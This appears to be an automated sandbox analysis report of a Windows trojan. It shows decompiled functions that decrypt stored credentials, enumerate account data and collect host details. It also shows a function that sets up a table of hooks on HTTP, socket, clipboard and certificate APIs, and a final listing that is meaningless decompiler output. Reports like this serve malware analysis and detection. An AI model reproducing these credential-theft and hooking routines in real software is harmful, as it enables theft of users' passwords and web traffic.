    • Instruction Fuzzy Hash: 5DE0D83220020066E7205B39AC4EE6F25AD9BC17B0B540738F472E61E1D7388CC28124
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00417429(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v5;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v44;
    				signed int _v48;
    				void* _v52;
    				char _v56;
    				char _v72;
    				void* _v96;
    				char _v196;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				signed int _t65;
    				void* _t66;
    				void* _t68;
    				char* _t70;
    				intOrPtr _t77;
    				signed int* _t82;
    				intOrPtr _t95;
    				void* _t97;
    				signed int _t100;
    				void* _t107;
    				void* _t109;
    				intOrPtr _t115;
    				char* _t117;
    				void* _t129;
    
    				_t121 = __eflags;
    				_t115 = _a4;
    				_push(_t115);
    				_t92 = __eax;
    				_t48 = E004173D6(__eax, __eflags, 0x4c);
    				_push(_t115);
    				_v20 = _t48;
    				_t50 = E004173D6(_t92, _t121, 0x4f);
    				_push(_t115);
    				_v24 = _t50;
    				_t52 = E004173D6(_t92, _t121, 0x50);
    				_push(_t115);
    				_v28 = _t52;
    				_t54 = E004173D6(_t92, _t121, 0x4d);
    				_push(_t115);
    				_v36 = _t54;
    				_v12 = E004173D6(_t92, _t121, 0x4e);
    				_v5 = _v20 != 0;
    				if(_v5 != 0) {
    					_t95 = _v12;
    					_t65 = E004079D4(_t95);
    					if(_t95 != 0 && _t65 > 1) {
    						_t100 = _t65 & 0x80000001;
    						if(_t100 < 0) {
    							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
    						}
    						if(_t129 == 0) {
    							asm("cdq");
    							_v48 = _t65 - _t107 >> 1;
    							_t77 = E00406E55(_t65 - _t107 >> 1);
    							_v44 = _t77;
    							if(_t77 != 0) {
    								if(E004076C2(_v12, _t77) != 0) {
    									_t82 =  &_v48;
    									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
    									if(_t82 == 1) {
    										_v16 = E00407241(_v52);
    										LocalFree(_v52);
    									}
    								}
    								E00406E85(_v44);
    							}
    						}
    					}
    					_t66 = 0x4b;
    					E00405B00(_t66,  &_v196);
    					_t117 =  &_v72;
    					_t68 = 0x54;
    					E00405B00(_t68, _t117);
    					_t70 = 0x404284;
    					_t109 =  ==  ? 0x404284 : _v16;
    					_t97 =  ==  ? 0x404284 : _v36;
    					_t135 = _v32;
    					if(_v32 != 0) {
    						_t70 = _t117;
    					}
    					_push(_t109);
    					_push(_t97);
    					_push(_t70);
    					_push(_v20);
    					E00407C06(_a12, E004079D4( *_a12),  *_a12, _t135,  &_v196, _a4);
    					_t56 = E00406E85(_v16);
    				}
    				E0040D413(E0040D413(E0040D413(E0040D413(E0040D413(_t56, _v20), _v24), _v28), _v36), _v12);
    				return _v5;
    			}

    APIs
    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00417520
    • LocalFree.KERNEL32(?,?,?,?), ref: 0041753C
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$CryptDataHeapLocalUnprotect
    • String ID:
    • API String ID: 2231100991-0
    • Opcode ID: e6e4262530a558d2759a3e9068cbe32fce09d7cf7a0e2d8e6b766706a3371319
    • Instruction ID: 9021a5df0f03a69deff09ab63c51ef76268b344bbb722c734445a6d3c89891a3
    • Opcode Fuzzy Hash: e6e4262530a558d2759a3e9068cbe32fce09d7cf7a0e2d8e6b766706a3371319
    • Instruction Fuzzy Hash: 7351BC71E08218AADF10AFE1DC45AEEBB76EF48314F10443AF515F7191D738A981CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00408C27(void* __eax, void* __ecx, void* _a4, intOrPtr* _a8, void* _a12) {
    				long _v8;
    				char _v12;
    				void* __esi;
    				void* _t21;
    				intOrPtr* _t25;
    				void* _t29;
    				char _t34;
    				intOrPtr _t39;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t29 = __eax;
    				_t34 = 0;
    				if(__eax == 0 || __eax > 0xa00000) {
    					_t29 = 0xa00000;
    				}
    				_v12 = _t34;
    				while(_a12 == 0 || WaitForSingleObject(_a12, 0) == 0x102) {
    					_t4 = _t34 + 0x1000; // 0x1000
    					_v8 = 0x1000;
    					if(E00406E10(_t4,  &_v12) == 0) {
    						break;
    					}
    					_t39 = _v12;
    					if(InternetReadFile(_a4, _t39 + _t34, _v8,  &_v8) == 0) {
    						break;
    					}
    					if(_v8 == 0) {
    						_t25 = _a8;
    						if(_t25 == 0) {
    							E00406E85(_t39);
    						} else {
    							 *_t25 = _t39;
    							 *((intOrPtr*)(_t25 + 4)) = _t34;
    						}
    						_t21 = 1;
    						L11:
    						return _t21;
    					}
    					_t34 = _t34 + _v8;
    					if(_t34 <= _t29) {
    						continue;
    					}
    					break;
    				}
    				E00406E85(_v12);
    				_t21 = 0;
    				goto L11;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00408E84,00000000,00000000,?,00000000,?,?,?), ref: 00408C50
    • InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 00408C87
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FileInternetObjectReadSingleWait
    • String ID:
    • API String ID: 226868713-0
    • Opcode ID: 7c9d5e5046c0aa7e50521916ce029fbb9dfa058464818703eeb18ea407df084e
    • Instruction ID: 305886e2ae2d526fac91624fc6de371cc2ad79be6fad2a1e570f80f7053b528d
    • Opcode Fuzzy Hash: 7c9d5e5046c0aa7e50521916ce029fbb9dfa058464818703eeb18ea407df084e
    • Instruction Fuzzy Hash: 91119031605209ABEF118F95CA44BEEB7B9EB40344F10007EE585B7290DBB99E81DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00417185() {
    				void* _v8;
    				char _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				void* _v28;
    				void* _v32;
    				char _v44;
    				char _v56;
    				char _v68;
    				char _v132;
    				void* _v388;
    				void* _v644;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t60;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				signed int _t72;
    				intOrPtr* _t73;
    				intOrPtr* _t75;
    				signed int _t76;
    				intOrPtr* _t80;
    				signed int _t81;
    				void* _t85;
    				void* _t87;
    				void* _t91;
    				void* _t94;
    				void* _t100;
    				void* _t106;
    				intOrPtr* _t112;
    				signed int _t114;
    				intOrPtr _t122;
    				void* _t123;
    				void* _t130;
    				void* _t132;
    				intOrPtr* _t133;
    				intOrPtr* _t136;
    				void* _t141;
    
    				_t60 =  &_v32;
    				_t114 = 0;
    				_v32 = 0;
    				__imp__CoCreateInstance(0x404ad0, 0, 0x4401, 0x404ae0, _t60);
    				if(_t60 != 0) {
    					L3:
    					_v20 = _t114;
    					_t133 = _t114;
    					L4:
    					if(_t133 == _t114) {
    						return _t60;
    					}
    					_push(1);
    					_push(_t114);
    					_push(_t133);
    					_v12 = _t114;
    					if( *((intOrPtr*)( *_t133 + 0x40))() != 0) {
    						L33:
    						 *((intOrPtr*)( *_t133 + 8))(_t133);
    						_push(0xcc);
    						return E00416CBC(_t126, _v12, 0x3e);
    					}
    					_push( &_v28);
    					_push(0xe);
    					_push(_t133);
    					if( *((intOrPtr*)( *_t133 + 0x14))() != 0) {
    						goto L33;
    					}
    					while(1) {
    						_t69 = _v28;
    						_t126 =  &_v8;
    						_push( &_v8);
    						_push(_t69);
    						if( *((intOrPtr*)( *_t69 + 0x14))() != 0) {
    							break;
    						}
    						_t71 = _v8;
    						_t72 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v16);
    						__eflags = _t72;
    						if(_t72 == 0) {
    							__eflags = _v16 - _t114;
    							if(_v16 != _t114) {
    								_t75 = _v8;
    								_t76 =  *((intOrPtr*)( *_t75 + 0x14))(_t75, 0x123503f0,  &_v388, 0x100);
    								__eflags = _t76;
    								if(_t76 == 0) {
    									__eflags =  &_v388 | 0xffffffff;
    									_v24 = E004070C5( &_v388 | 0xffffffff, _t114,  &_v388);
    								} else {
    									_v24 = _t114;
    								}
    								_t80 = _v8;
    								_t81 =  *((intOrPtr*)( *_t80 + 0x14))(_t80, 0x143203f0,  &_v644, 0x100);
    								__eflags = _t81;
    								if(_t81 == 0) {
    									__eflags =  &_v644 | 0xffffffff;
    									_t132 = E004070C5( &_v644 | 0xffffffff, _t114,  &_v644);
    								} else {
    									_t132 = 0;
    								}
    								_t85 = 0x4a;
    								E00405B00(_t85,  &_v132);
    								_t87 = 0x404284;
    								_t130 = 0x404284;
    								__eflags = _t132 - _t114;
    								if(_t132 != _t114) {
    									_t130 = _t132;
    								}
    								_t122 = _v24;
    								_t136 = _v12;
    								__eflags = _t122 - _t114;
    								_t123 =  ==  ? _t87 : _t122;
    								__eflags = _t136 - _t114;
    								if(_t136 != _t114) {
    									__eflags =  *_t136 - _t114;
    									if( *_t136 != _t114) {
    										_t87 = 0x404b40;
    									}
    								}
    								_push(_t130);
    								_push(_t123);
    								_t91 = E00407C06( &_v12, E004079D4(_t136), _t136, __eflags,  &_v132, _t87);
    								_t141 = _t141 + 0x10;
    								E00406E85(_v24);
    								E00406E85(_t132);
    								__eflags = _t91 - 0xffffffff;
    								if(_t91 == 0xffffffff) {
    									_t30 =  &_v16;
    									 *_t30 = _v16 & 0x00000000;
    									__eflags =  *_t30;
    								}
    								__eflags = _v16 & 0x00000002;
    								if((_v16 & 0x00000002) != 0) {
    									_t106 = 0x53;
    									E00405B00(_t106,  &_v68);
    									E00417045(_v8,  &_v68, 0x129803f0, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v12);
    								}
    								__eflags = _v16 & 0x00000004;
    								if((_v16 & 0x00000004) != 0) {
    									_t100 = 0x52;
    									E00405B00(_t100,  &_v56);
    									E00417045(_v8,  &_v56, 0x13c403f0, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v12);
    								}
    								__eflags = _v16 & 0x00000008;
    								if((_v16 & 0x00000008) != 0) {
    									_t94 = 0x51;
    									E00405B00(_t94,  &_v44);
    									E00417045(_v8,  &_v44, 0x142803f0, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v12);
    								}
    								_t133 = _v20;
    								_t114 = 0;
    								__eflags = 0;
    							}
    						}
    						_t73 = _v8;
    						 *((intOrPtr*)( *_t73 + 8))(_t73);
    					}
    					_t112 = _v28;
    					 *((intOrPtr*)( *_t112 + 8))(_t112);
    					goto L33;
    				}
    				_t133 = _v32;
    				if(_t133 == 0) {
    					goto L3;
    				} else {
    					_v20 = _t133;
    					goto L4;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(00404AD0,00000000,00004401,00404AE0,?,?,00000000,00000001), ref: 004171AA
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    • Opcode ID: ea1e182f24280a5a3c27a789cda9a9344a354ac158f9946413158e52104d4bab
    • Instruction ID: 2b5aecae1da8b6085c7200bc0ebd95fa64390b05dd46823f8fbcc3c2df7c9a7e
    • Opcode Fuzzy Hash: ea1e182f24280a5a3c27a789cda9a9344a354ac158f9946413158e52104d4bab
    • Instruction Fuzzy Hash: BD617271A44219AFDB10DAA5CC84EEF77B8EF44304F1445AAF911F7281DB78AE81CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0041A525(signed short* __eax, void* __ecx) {
    				signed int _v8;
    				void* __esi;
    				signed int* _t7;
    				void* _t8;
    				signed short* _t9;
    				signed int _t10;
    				signed int _t13;
    				signed short _t14;
    				void* _t15;
    
    				_t16 = __eax;
    				_t7 =  &_v8;
    				_v8 = 0x104;
    				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
    				if(_t7 == 0) {
    					L8:
    					_t8 = 6;
    					_t9 = E00405B00(_t8, _t16);
    				} else {
    					_t10 = _v8;
    					if(_t10 == 0) {
    						goto L8;
    					} else {
    						 *((short*)(__eax + _t10 * 2)) = 0;
    						_t9 = __eax;
    						if( *((intOrPtr*)(__eax)) != 0) {
    							do {
    								_t13 =  *_t9 & 0x0000ffff;
    								if(_t13 == 0x2f || _t13 == 0x5c) {
    									_t14 = 0x7c;
    									 *_t9 = _t14;
    								}
    								_t9 =  &(_t9[1]);
    							} while ( *_t9 != 0);
    						}
    					}
    				}
    				return _t9;
    			}

    APIs
    • GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041A67C,?,?,00000000), ref: 0041A53A
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: NameUser
    • String ID:
    • API String ID: 2645101109-0
    • Opcode ID: 77635d3ea06ffbda6b44b86e8a01936941a8b5ece78e28c4f6ae0931e94d267b
    • Instruction ID: 538225396efdd971b5e479c78a530fc63e3d4360a82f2c312a19ca144f3c355b
    • Opcode Fuzzy Hash: 77635d3ea06ffbda6b44b86e8a01936941a8b5ece78e28c4f6ae0931e94d267b
    • Instruction Fuzzy Hash: 4DF0F671A09304BADB349B9898056E733A9DF05750F54405BE406EB2E0E2B89DD0925E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406FAF() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t11;
    				void* _t13;
    
    				_t11 = _t13 - 0x78;
    				_t7 = GetTimeZoneInformation(_t11 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t11 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t11 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 00406FBE
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: 81a8d4a7f76daaa5016d486e14e69b7a3d866444cd98cb0543a14aa2b758c59b
    • Instruction ID: 49fa538f8dd1471a71ffc8dbae4bb53e21d49f367db3c94685850a60e087f29e
    • Opcode Fuzzy Hash: 81a8d4a7f76daaa5016d486e14e69b7a3d866444cd98cb0543a14aa2b758c59b
    • Instruction Fuzzy Hash: D0E08C31A0400DCBDB20DBA4FF8189D77EAAB14314F220822F003F61C0E238EA668A06
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E00404D18() {
    				void* __ebx;
    				intOrPtr _t1;
    				intOrPtr _t7;
    				signed int _t55;
    				void* _t57;
    				void* _t58;
    
    				_t1 =  *0x42398c;
    				if(_t1 == 0) {
    					_t1 =  *0x423988;
    					 *0x422024 = E00413CEC;
    				} else {
    					 *0x422024 = E00413DA3;
    				}
    				 *0x422020 = _t1;
    				 *0x422030 =  *0x423998;
    				 *0x422040 = GetFileAttributesExW;
    				 *0x422050 = HttpSendRequestW;
    				 *0x422060 = HttpSendRequestA;
    				 *0x422070 = HttpSendRequestExW;
    				_t7 = __imp__HttpSendRequestExA; // 0x70606830
    				 *0x422080 = _t7;
    				 *0x422090 = InternetCloseHandle;
    				 *0x4220a0 = InternetReadFile;
    				 *0x4220b0 = __imp__InternetReadFileExA;
    				 *0x4220c0 = InternetQueryDataAvailable;
    				 *0x4220d0 = HttpQueryInfoA;
    				 *0x4220e0 = __imp__#3;
    				 *0x4220f0 = __imp__#19;
    				 *0x422100 = __imp__WSASend;
    				 *0x422110 = OpenInputDesktop;
    				 *0x422120 = SwitchDesktop;
    				 *0x422130 = DefWindowProcW;
    				 *0x422140 = DefWindowProcA;
    				 *0x422150 = DefDlgProcW;
    				 *0x422160 = DefDlgProcA;
    				 *0x422170 = DefFrameProcW;
    				 *0x422180 = DefFrameProcA;
    				 *0x422190 = DefMDIChildProcW;
    				 *0x4221a0 = DefMDIChildProcA;
    				 *0x4221b0 = CallWindowProcW;
    				 *0x4221c0 = CallWindowProcA;
    				 *0x4221d0 = RegisterClassW;
    				 *0x4221e0 = RegisterClassA;
    				 *0x4221f0 = RegisterClassExW;
    				 *0x422200 = RegisterClassExA;
    				 *0x422210 = BeginPaint;
    				 *0x422220 = EndPaint;
    				 *0x422230 = GetDCEx;
    				 *0x422240 = GetDC;
    				 *0x422250 = GetWindowDC;
    				 *0x422260 = ReleaseDC;
    				 *0x422270 = GetUpdateRect;
    				 *0x422280 = GetUpdateRgn;
    				 *0x422290 = GetMessagePos;
    				 *0x4222a0 = GetCursorPos;
    				 *0x4222b0 = SetCursorPos;
    				 *0x4222c0 = SetCapture;
    				 *0x4222d0 = ReleaseCapture;
    				 *0x4222e0 = GetCapture;
    				 *0x4222f0 = GetMessageW;
    				 *0x422300 = GetMessageA;
    				 *0x422310 = PeekMessageW;
    				 *0x422320 = PeekMessageA;
    				 *0x422330 = TranslateMessage;
    				_push(0x422020);
    				 *0x422340 = GetClipboardData;
    				_t55 = 0x34;
    				 *0x422350 = __imp__PFXImportCertStore;
    				return E00404C87(_t55, _t57, _t58);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocVirtual
    • String ID: 0h`p
    • API String ID: 4275171209-2723391422
    • Opcode ID: 5b8e33e60777e3fea83f8966454d9b0cd230e3952f20e8336c747d9c03241aeb
    • Instruction ID: 92e1f1d8fc592594c7893f478b6e0e9fd0bf1c0395f6b048434305da64655aa0
    • Opcode Fuzzy Hash: 5b8e33e60777e3fea83f8966454d9b0cd230e3952f20e8336c747d9c03241aeb
    • Instruction Fuzzy Hash: 6B61B9B8A01201EFD3A1CF28EF80A507BE5B74C355384427AE909E7731E7B5A956CB1D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00402823(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __fp0) {
    				intOrPtr* _t95;
    				void* _t96;
    				void* _t98;
    				intOrPtr* _t100;
    				void* _t102;
    				intOrPtr* _t104;
    				signed char _t111;
    				signed char _t112;
    				signed char _t113;
    				signed char _t114;
    				signed char _t127;
    				signed char _t128;
    				signed char _t132;
    				signed char _t133;
    				void* _t165;
    				void* _t168;
    				intOrPtr* _t169;
    				void* _t170;
    				void* _t171;
    				intOrPtr* _t172;
    				intOrPtr* _t187;
    				intOrPtr* _t188;
    				void* _t189;
    				intOrPtr* _t191;
    				signed char _t195;
    				intOrPtr* _t205;
    				signed char _t213;
    				signed char _t217;
    				intOrPtr* _t224;
    				intOrPtr* _t225;
    				void* _t226;
    				intOrPtr* _t229;
    				void* _t230;
    				intOrPtr* _t232;
    				intOrPtr* _t233;
    				void* _t236;
    				intOrPtr* _t237;
    				void* _t239;
    				void* _t241;
    				void* _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    				void* _t249;
    				void* _t251;
    				void* _t252;
    				void* _t253;
    				void* _t254;
    
    				_t232 = __esi;
    				_t168 = __ebx;
    				_t205 = __edx + __ecx;
    				 *__eax =  *__eax + __ebx;
    				_t253 = _t252 + __ecx;
    				 *_t205 =  *_t205 + __ebx;
    				 *__esi =  *__esi + __ecx;
    				_t95 = __eax + _t205;
    				 *_t95 =  *_t95 + _t205;
    				 *((intOrPtr*)(__ebx + 1)) =  *((intOrPtr*)(__ebx + 1)) + _t95;
    				asm("rol byte [ecx], cl");
    				_t224 = __edi + __ecx + 1;
    				_t242 = _t241 + _t205;
    				 *((intOrPtr*)(_t95 + 1)) =  *((intOrPtr*)(_t95 + 1)) + _t205;
    				_pop(_t96);
    				_t187 = __ecx + _t205 + __ebx;
    				_t5 = __esi + 1;
    				 *_t5 =  *((intOrPtr*)(__esi + 1)) + _t242;
    				asm("fild dword [ecx]");
    				if( *_t5 >= 0) {
    					asm("fiadd word [ecx]");
    				}
    				 *((intOrPtr*)(_t205 + 1)) =  *((intOrPtr*)(_t205 + 1)) + _t253;
    				asm("loopne 0x3");
    				_push(_t242);
    				_t169 = _t168 + _t253;
    				 *_t169 =  *_t169 + _t96;
    				_t243 = _t242 + _t253;
    				 *_t205 =  *_t205 + _t224;
    				_t233 = _t232 + _t253;
    				 *_t224 =  *_t224 + _t96;
    				 *0x1901ea01 =  *0x1901ea01 + _t187;
    				_t254 = _t253 + _t243;
    				 *_t169 =  *_t169 + _t169;
    				_t225 = _t224 + _t243;
    				 *_t225 =  *_t225 + _t187;
    				_t98 = _t96 + _t243 + _t233;
    				 *_t187 =  *_t187 + _t205;
    				_t188 = _t187 + _t233;
    				 *((intOrPtr*)(_t188 + _t98 - 0xe)) =  *((intOrPtr*)(_t188 + _t98 - 0xe)) + _t98;
    				 *((intOrPtr*)(_t98 + 1)) =  *((intOrPtr*)(_t98 + 1)) + _t188;
    				asm("cmc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t205;
    				asm("clc");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t169;
    				asm("stc");
    				 *((intOrPtr*)(_t225 + 1)) =  *((intOrPtr*)(_t225 + 1)) + _t243;
    				asm("sti");
    				 *((intOrPtr*)(_t188 + 1)) =  *((intOrPtr*)(_t188 + 1)) + _t233;
    				 *_t188 =  *_t188 + 1;
    				asm("arpl [ecx], ax");
    				 *_t188 =  *_t188 + 1;
    				_t100 =  *0xa6012602 +  *((intOrPtr*)(_t188 +  *0xa6012602));
    				_t170 = _t169 +  *_t233;
    				 *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) =  *((intOrPtr*)(_t205 + _t100 + 0x2b10134)) + _t243;
    				asm("daa");
    				 *((intOrPtr*)(_t233 - 0x46fedafe)) =  *((intOrPtr*)(_t233 - 0x46fedafe)) + _t233;
    				 *((intOrPtr*)(_t170 - 0x43fee0fe)) =  *((intOrPtr*)(_t170 - 0x43fee0fe)) + _t225;
    				_t189 = _t188 +  *_t100;
    				_t102 = _t100 +  *_t100 + _t170;
    				_t171 = _t170 +  *((intOrPtr*)(_t189 + _t102));
    				asm("insb");
    				_t172 = _t171 +  *((intOrPtr*)(_t189 + _t102 - 0x1b));
    				_t236 = _t233 + _t100 + _t171 + _t254;
    				_t191 = _t189 +  *_t172 +  *((intOrPtr*)(_t189 +  *_t172));
    				_t245 = _t243 + _t205 +  *_t188 +  *0xa02c501 + _t236;
    				_t104 = _t102 +  *_t191 + _t225;
    				_t237 = _t236 + _t225;
    				 *0xa3013803 = _t104;
    				asm("movsd");
    				_t246 = _t245 +  *_t104;
    				 *((intOrPtr*)(_t237 - 0x55fec4fd)) =  *((intOrPtr*)(_t237 - 0x55fec4fd)) + _t254;
    				 *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) =  *((intOrPtr*)(_t172 +  *0x6d02fd01 +  *((intOrPtr*)(_t245 + 1)) - 0x53feddfd)) + _t246;
    				_push(_t225);
    				 *((intOrPtr*)(_t246 - 0x49fed6fd)) =  *((intOrPtr*)(_t246 - 0x49fed6fd)) + _t237;
    				_t226 = _t225 +  *((intOrPtr*)(_t191 + _t104));
    				 *((intOrPtr*)(3 + _t104 + 0x3bd0167)) =  *((intOrPtr*)(3 + _t104 + 0x3bd0167)) + _t226;
    				 *((intOrPtr*)(_t226 - 0x3ffeb4fd)) =  *((intOrPtr*)(_t226 - 0x3ffeb4fd)) + _t226;
    				asm("rol byte [ebx], cl");
    				_t239 = _t237 +  *_t237 +  *0xFFFFFFFFBB011304;
    				_push(0x6a03de01);
    				_t229 = _t226 + _t104 +  *_t104 + _t191 + _t254 +  *((intOrPtr*)(_t237 + 1)) +  *3 + _t191 - 1;
    				_t249 = _t246 +  *_t237 +  *0xbb011303 +  *_t229;
    				_t213 = 0xffffffffbb011302 +  *_t237 +  *_t229;
    				_t230 = _t229 + _t249;
    				asm("repne add ecx, [ebp+0x1]");
    				asm("repe add esi, [edi]");
    				_t195 = _t191 + 0xffffffff76022609 + _t239 + _t230;
    				asm("std");
    				_t251 = _t249 +  *((intOrPtr*)(0xffffffffbb011306)) +  *((intOrPtr*)(_t195 + 1));
    				 *((char*)(0xffffffffbb011306)) =  *((char*)(0xffffffffbb011306)) + 1;
    				_t111 = 0x3e +  *_t195 * 0x7e;
    				 *(_t195 - 0x5dcffdfc) =  *(_t195 - 0x5dcffdfc) & _t111;
    				_t112 = _t111 + 0xc;
    				 *0xFFFFFFFF5F31200A =  *0xFFFFFFFF5F31200A ^ _t112;
    				_t113 = _t112 + 1;
    				 *(_t251 - 0x59cf04fc) =  *(_t251 - 0x59cf04fc) ^ _t113;
    				_t114 = _t113 + 0xf2;
    				 *(_t230 - 0x57cf5efc) =  *(_t230 - 0x57cf5efc) ^ _t114;
    				 *(_t195 - 0x55cf5afc) =  *(_t195 - 0x55cf5afc) ^ _t195;
    				 *0xFFFFFFFF6731BC0A =  *0xFFFFFFFF6731BC0A ^ _t195;
    				 *(_t251 - 0x51cf1afc) =  *(_t251 - 0x51cf1afc) ^ _t195;
    				 *(_t230 - 0x4fcf3cfc) =  *(_t230 - 0x4fcf3cfc) ^ _t195;
    				 *(_t195 - 0x4dcf5dfc) =  *(_t195 - 0x4dcf5dfc) ^ _t213;
    				 *0xFFFFFFFF6F31B90A =  *0xFFFFFFFF6F31B90A ^ _t213;
    				 *(_t251 - 0x49cf55fc) =  *(_t251 - 0x49cf55fc) ^ _t213;
    				 *(_t230 - 0x47cf52fc) =  *(_t230 - 0x47cf52fc) ^ _t213;
    				 *(_t195 - 0x45cf4efc) =  *(_t195 - 0x45cf4efc) ^ 0xffffffffbb011306;
    				 *0xFFFFFFFF7731C80A =  *0xFFFFFFFF7731C80A ^ 0xffffffffbb011306;
    				 *(_t251 - 0x41cf46fc) =  *(_t251 - 0x41cf46fc) ^ 0xffffffffbb011306;
    				 *(_t230 - 0x3fcf42fc) =  *(_t230 - 0x3fcf42fc) ^ 0xffffffffbb011306;
    				_t127 = _t114 + 0x99a;
    				_t128 = _t127 + 0xc1;
    				_t132 = (_t128 + 0x18a ^ _t128 + 0x18a) + 0xc8;
    				_t133 = _t132 + 0xca;
    				_t217 = _t213 ^ _t128 ^ _t133 ^ 0;
    				_t165 = ((((((_t133 + 0x197 ^ _t195 ^ _t127 ^ _t132) + 0x33c ^ 0) + 0x366 ^ _t217) + 0x382 ^ 0) + 0x39b ^ 0x00000003) + 0x3ae ^ 0) + 0x319;
    				 *(_t251 + _t165 + 0x5bb060c) =  *(_t251 + _t165 + 0x5bb060c) ^ 0 ^ _t217 ^ 3;
    				asm("sbb eax, [esi]");
    				return _t165 + 0x05c20621 &  *(_t239 +  *0xFFFFFFFFBB011307);
    			}
    Address column for the listing above: 0x00402823 to 0x00402a8c.

    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ad2754d04f935819338fa239dfe4fe083a04389e42129f0e7cc6df87192f32c2
